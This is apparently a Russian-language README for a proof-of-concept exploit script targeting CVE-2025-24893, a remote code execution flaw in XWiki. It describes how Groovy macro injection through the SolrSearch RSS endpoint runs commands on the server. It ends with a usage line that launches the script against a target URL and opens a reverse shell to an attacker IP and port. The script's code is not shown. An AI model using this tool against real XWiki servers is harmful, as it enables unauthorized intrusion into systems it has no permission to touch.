
Полезная нагрузка Reverse Shell для CVE-2025-24893
PoC для CVE-2025-24893 – удаленное выполнение кода через макрос
<groovy>XWiki
Вдохновлено оригинальным PoC от Artemir
Это эксплоит в виде доказательства концепции (PoC) для CVE-2025-24893 — уязвимости удаленного выполнения кода (RCE) в уязвимых версиях XWiki.
Проблема заключается в неправильной санитизации пользовательского ввода в конечной точке SolrSearch, которая уязвима для внедрения незащищенного макроса <groovy> через запрос RSS-ленты.
Этот скрипт внедряет полезную нагрузку Groovy с помощью макроса async, что приводит к выполнению команд на сервере, позволяя атакующему инициировать обратную оболочку на свою систему.
python3 CVE-2025-24893-reverse-shell.py -u <target_url> -i <attacker_ip> -p <attacker_port>